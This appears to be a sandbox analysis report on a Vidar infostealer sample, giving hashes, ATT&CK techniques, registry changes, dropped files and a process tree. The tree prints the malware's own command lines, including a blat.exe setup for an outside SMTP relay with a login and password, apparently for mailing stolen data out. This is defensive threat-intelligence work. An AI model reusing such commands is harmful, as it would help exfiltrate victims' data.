vidar | aa6a6c1eb82a2226946431481ad54d4ab65f1bff3059506a370d66ee0378032f

General

Target

859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
Size

1.2MB
MD5

859fd7f4cb8cf72aea499822455491eb
SHA1

f8c8087d7931b643cd248dad75914586a06b0e15
SHA256

aa6a6c1eb82a2226946431481ad54d4ab65f1bff3059506a370d66ee0378032f
SHA512

0e5ab9ac15f904defa341bf6390eb5f6d6498969162eff36a45bec41f0a6e8292e29da87f44299e11912a398bcedc95bf354832d9678b886c732aa170cf01b7b
SSDEEP

24576:R8vDqXCTbpAzuY81lXqiC6iHvHJAs+9kAHhgkOX3gud4Phgyzma:RJXm8ulzHjs2s+9ukOv3yaa

Score

10^/10

vidar discovery stealer upx

Malware Config

Signatures

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe

Executes dropped EXE 2 IoCs

pid	Process
1756	blat.exe
3060	MPR.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4532-4-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral2/memory/4532-5-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral2/memory/4532-8-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral2/memory/4532-7-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral2/memory/4532-6-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral2/memory/4532-37-0x0000000000400000-0x0000000000798000-memory.dmp	upx

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2412 set thread context of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MPR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5032	PING.EXE

Modifies registry class 21 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7CF0.tmp\\MPR.exe,0"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf	MPR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7CF0.tmp\\MPR.exe"	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "MPR.DocHostUIHandler"	MPR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8"	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7CF0.tmp\\MPR.exe \"%1\""	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\ = "Implements DocHostUIHandler"	MPR.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5032	PING.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3060	MPR.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
3060	MPR.exe
3060	MPR.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 2412 wrote to memory of 4532	2412	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	85
PID 4532 wrote to memory of 3464	4532	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	88
PID 4532 wrote to memory of 3464	4532	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	88
PID 4532 wrote to memory of 3464	4532	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	88
PID 3464 wrote to memory of 5032	3464	cmd.exe	91
PID 3464 wrote to memory of 5032	3464	cmd.exe	91
PID 3464 wrote to memory of 5032	3464	cmd.exe	91
PID 3464 wrote to memory of 1756	3464	cmd.exe	96
PID 3464 wrote to memory of 1756	3464	cmd.exe	96
PID 3464 wrote to memory of 1756	3464	cmd.exe	96
PID 3464 wrote to memory of 3060	3464	cmd.exe	97
PID 3464 wrote to memory of 3060	3464	cmd.exe	97
PID 3464 wrote to memory of 3060	3464	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\1.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\SysWOW64\PING.EXE
      ping ya.ru -n 5
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\blat.exe
      blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u super.siteedit -pw 5255251
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\MPR.exe
      mpr.exe /export
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\1.bat

Filesize
359B

MD5
c311aa83d8effd9bceaa2d98deeb93e7

SHA1
11f3359260f4a74b0fa494740e1e1798f83ce863

SHA256
0101942c776d9a16b3704c4cd91138e007f7e4da66fea585fe2daadef950827f

SHA512
8d4d5080b63c3280d39cdabb9772eb937bec76c7e49eda0ec22c3e7a392b83cbe885cb99ead94ad507cfcd9a222b93b58aadfe1be5e2445c8783a55859df515a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\MPR.exe

Filesize
3.3MB

MD5
8dba37604bf06ebcef07dd1085865a6a

SHA1
1202eb0ea461c502daa7da9d7d75fff226bf57bd

SHA256
038ab25642a1220c27028d0b559062b43764c66541ec07a96b2a99d25d9638b0

SHA512
0f286677e964d733ea3270f0f196769d8ddddb4a6bb3007187eae56e9abb5e22ee984703df5356b5d9049e5ad3b24c567ae13773684113a4440b2cce5d0132fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\mpr.ini

Filesize
259B

MD5
3d4e4dc00c0be2d8b0762bedcedf6423

SHA1
cb24655abe244d225d2abfd92d3de5e32719ed65

SHA256
c80309abdb6ee682f4ec538f68a16e9b2732913b0193978fdb0d9221eb4f7528

SHA512
5145007b259e166bf11d8638833e34ae553ba8244b1b97710129b0faa0bbc0c4560e567a9707a38797756819004bd4b592cd1b708d95e28cc244df7dfe65635f

Download Submit
memory/2412-0-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2412-10-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3060-41-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/3060-38-0x0000000000500000-0x000000000084A000-memory.dmp

Filesize
3.3MB

Download
memory/3060-35-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/4532-8-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4532-6-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4532-7-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4532-37-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4532-5-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4532-4-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download

Analysis

Sharing